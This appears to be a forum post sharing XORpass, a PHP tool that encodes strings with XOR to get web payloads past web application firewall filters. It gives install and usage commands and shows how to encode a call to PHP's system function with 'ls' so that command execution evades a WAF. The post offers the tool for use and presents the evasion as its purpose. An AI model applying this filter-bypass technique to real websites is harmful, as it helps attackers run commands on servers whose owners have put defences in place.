- Joined
- May 15, 2017
- Messages
- 981
- Likes
- 760
- Points
- 1,045
![](https://1.bp.blogspot.com/-9IxswlYcTPw/XbZhRGu4PdI/AAAAAAAAQyQ/l5OkhvIEZJkY8vum8njviMh_XT-Za-VrQCNcBGAsYHQ/s640/XORpass_1.png)
XORpass is an encoder to bypass WAF filters using XOR operations.
Installation & Usage
Example of bypass:Code:
git clone https://github.com/devploit/XORpass
cd XORpass
php encode.php STRING
php decode.php "XORed STRING"
Using clear PHP function:
![](https://1.bp.blogspot.com/-CbFdbwxkfEM/XbZhW8jM89I/AAAAAAAAQyU/upMiPoIgu0kRdlwiOzO7vUJAuz8RUhW2gCNcBGAsYHQ/s640/XORpass_3.png)
Using XOR bypass of that function:
Code:
php encode.php system # return A
php encode.php ls # return B
payload == A(B)
![](https://1.bp.blogspot.com/-f5cXVTFT1KI/XbZhas3VF-I/AAAAAAAAQyY/zyUgN0S-zjYOFWnqYWA6OCG85BLaY0WCQCNcBGAsYHQ/s640/XORpass_4.png)
Download XORpass